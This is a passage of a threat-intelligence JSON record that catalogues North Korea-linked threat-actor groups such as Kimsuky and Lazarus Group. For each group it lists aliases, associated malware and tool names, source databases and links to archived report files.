				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c306e698-3b48-46d7-b571-3dfa0c828379",
			"created_at": "2023-05-16T02:02:09.957677Z",
			"updated_at": "2026-04-10T02:00:03.364345Z",
			"deleted_at": null,
			"main_name": "APT43",
			"aliases": [],
			"source_name": "MISPGALAXY:APT43",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0106b19a-ac99-4bc9-90b9-4647bfc5f3ce",
			"created_at": "2023-11-08T02:00:07.144995Z",
			"updated_at": "2026-04-10T02:00:03.425891Z",
			"deleted_at": null,
			"main_name": "TraderTraitor",
			"aliases": [
				"Pukchong",
				"Jade Sleet",
				"UNC4899"
			],
			"source_name": "MISPGALAXY:TraderTraitor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43",
				"ARCHIPELAGO",
				"Black Banshee",
				"Crooked Pisces",
				"Emerald Sleet",
				"ITG16",
				"Kimsuky",
				"Larva-24005",
				"Opal Sleet",
				"Ruby Sleet",
				"SharpTongue",
				"Sparking Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"THALLIUM",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7a2dd0e8-beea-415c-b90d-4df9da8358ae",
			"created_at": "2024-09-20T02:00:04.575485Z",
			"updated_at": "2026-04-10T02:00:03.695726Z",
			"deleted_at": null,
			"main_name": "UNC2970",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2970",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434345,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/25d1e0f161e755fb43a986a32487aaeaf06aa589.pdf",
		"text": "https://archive.orkl.eu/25d1e0f161e755fb43a986a32487aaeaf06aa589.txt",
		"img": "https://archive.orkl.eu/25d1e0f161e755fb43a986a32487aaeaf06aa589.jpg"
	}
}